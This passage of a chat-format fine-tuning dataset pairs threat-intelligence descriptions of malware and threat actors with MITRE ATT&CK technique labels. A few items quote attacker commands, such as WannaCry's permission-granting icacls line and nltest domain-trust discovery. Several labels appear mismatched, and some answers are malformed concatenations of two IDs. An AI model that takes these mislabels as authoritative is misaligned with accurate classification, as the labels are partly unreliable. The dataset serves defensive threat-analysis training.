- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has acquired multiple servers for some of their operations, using each server for a different role."
- },
- {
- "role": "assistant",
- "content": "T1583.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba can enumerate local drives, disk type, and disk free space."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whitefly has the ability to download additional tools from the C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet collects the IP address of a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The archive contains a legitimate older version of Microsoft Word (Microsoft Word 2007) executable file that is named ‘Noi dung chi tiet don khieu nai gui cong ty.exe’ which translates to ‘Learn more about how to use your company’ in English. The attacker used the DLL side loading technique to load a malicious DLL by the older version of Microsoft Word. When opening the executable file in the archive, it loads the malicious DLL in the same directory. The DLL executes multi-stage shellcodes and each shellcode employs various technique to hide the next stage"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTTPBrowser has used DLL side-loading."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hikit has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has removed system logs from \"/var/log/syslog\"."
- },
- {
- "role": "assistant",
- "content": "T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can steal data and credentials from browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea adds Registry Run keys to achieve persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SamSam has been seen deleting its own files and payloads to make analysis of the attack more difficult."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has compressed files before exfiltration using TAR and RAR."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Throughout the intrusion, the injected Cobalt Strike Processes utilized various named pipes for inter-process communications. Many of these pipes used default Cobalt Strike pipe patterns."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to obtain file and directory listings."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This DLL is used to create a scheduled task that points to the QuasarRAT binary, microsoft_network.exe, allowing it to remain persistent after reboot"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This module searches the infected system’s files to gather email addresses for information-stealing purposes."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer decrypts code to connect to a remote C2 server."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY can decrypt encrypted strings and write them to a newly created folder."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HenBox attempts to hide itself from the app launcher view by running the following code, passing the parameters COMPONENT_ENABLED_STATE_DISABLED (2) and DONT_KILL_APP (1) to the setComponentEnabledSetting() method."
- },
- {
- "role": "assistant",
- "content": "T1564 - Hide Artifacts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After completing this wiping functionality, the sample will reboot the system using the following command line, which will render it unusable when the system reboots as the important system locations and files have been overwritten with random data"
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LaZagne can perform credential dumping from MSCache to obtain account and password information."
- },
- {
- "role": "assistant",
- "content": "T1003.005 - OS Credential Dumping: Cached Domain Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object. 2) Lock PowerShell Execution Policy, must be set to “AllSigned” via GPO. 3) An allowlisting solution to prevent certain process child-parent execution hierarchies"
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum's backdoor deletes files after they have been successfully uploaded to C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The FIVEHANDS payload is encrypted with AES-128."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire contains some modules that leverage API hooking to carry out tasks, such as netripper."
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks for the existence of anti-virus."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peirates can gain a reverse shell on a host node by mounting the Kubernetes hostPath."
- },
- {
- "role": "assistant",
- "content": "T1611 - Escape to Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare can capture camera video as part of its collection process."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code."
- },
- {
- "role": "assistant",
- "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has searched for vulnerabilities, tools, and geopolitical trends on Google search engine to target victims"
- },
- {
- "role": "assistant",
- "content": "T1593.002 - Search Engines"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following command line is a service created by CobaltStrike and can be found in Windows Event Logs (event id 7045). It runs an encoded powershell command"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the filename owaauth.dll, which is a legitimate file that normally resides in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\; the malicious file by the same name is saved in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used PowerShell on victim systems to download and run payloads after exploitation."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM has sent spearphishing emails with attachments to victims as its primary initial access vector."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code. POWERSTATS's backdoor code is a multi-layer obfuscated, encoded, and compressed blob. POWERSTATS has used PowerShell code with custom string obfuscation"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A version of Daserf uses the MPRESS packer."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate can use WMI for execution on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Instead of more traditional malware like a Windows executable (.exe) or Dynamic Link Library (.dll), the malware authors used a browser extension as their final payload"
- },
- {
- "role": "assistant",
- "content": "T1176 - Browser Extensions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has leveraged numerous pieces of malware that appear to be unique to APT29 and were likely developed for or by the group."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For CostaRicto, the threat actors used custom malware, including PS1, CostaBricks, and SombRAT."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has run the \"xp_cmdshell\" command in MS-SQL."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USB Worm -> this is the USBWorm component developed for stealing files from removable drives, spread across systems by infecting removable media, and download and execute the “Thin Client” component from a remote Crimson server"
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amadey has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has used DLL side-loading, including by using legitimate Kaspersky antivirus variants in which the DLL acts as a stub loader that loads and executes the shell code."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry uses \"attrib +h\" and \"icacls . /grant Everyone:F /T /C /Q\" to make some of its files hidden and grant all users full access controls."
- },
- {
- "role": "assistant",
- "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ABK can extract a malicious Portable Executable (PE) from a photo."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HDoor kills anti-virus found on the victim."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cmd /c tasklist: Executes this command to collect a list of running processes on victim’s machine and store them in a tmp file"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can upload and download files to the victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Linux Rabbit to establish a connection with the C2 server, it utilizes Tor hidden services to act as contact points to access a Tor gateway. The malware will randomly select one of the hidden services and then a Tor gateway to follow in order to establish an active C2 URL. The payload for the malware is then sent from the C2 server as an encoded URL parameter"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark can send DNS C2 communications using a unique domain generation algorithm."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee has been downloaded to victim's machines from OneDrive."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DEATHRANSOM can delete volume shadow copies on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Umbreon hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can run \"nltest /domain_trusts /all_trusts\" for domain trust discovery."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Heyoka Backdoor can establish persistence with the auto start function including using the value `EverNoteTrayUService`."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One computer that was infected with both Cadelspy and Remexi was a system that ran a SIM card editing application"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware creates a shortcut %APPDATA%\\dotNET.lnk pointing to the copy of the malware under %APPDATA%."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As can be seen from the Table 2 above, Kazuar has an extensive command set, many of which are similar in functionality as other backdoor Trojans. However, a few commands specific to Kazuar appear to be unique and are worth further discussion"
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 7 shows how DCRat collects the public IP address from the compromised host by accessing the IP web service named as “https[:]//ipinfo[.]io/json”."
- },
- {
- "role": "assistant",
- "content": "T1590.005 - IP Addresses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth uses ActiveX objects for file execution and manipulation."
- },
- {
- "role": "assistant",
- "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to access the file system on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rancor has attached a malicious document to an email to gain initial access."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Get2 has the ability to run executables with command-line arguments."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FLIPSIDE is a simple proxy that creates an outbound RDP connection."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Use an advanced endpoint threat detection (AETD) solution to monitor activity on network endpoints. Also implement strict security controls for privileged accounts such as Active Directory administrator to prevent access by an unauthorized user"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuditCred can delete files from the system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable. In this particular instance, the payload is encoded via base64, which certutil decodes. The payload in question is a CAB file that is then unpacked. Finally, the malware executes the extracted install.bat script before deleting the original files and exiting"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can use PsExec to execute a payload on a remote host."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used net use to conduct internal discovery of systems. The group has also used quser.exe to identify existing RDP sessions on a victim."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
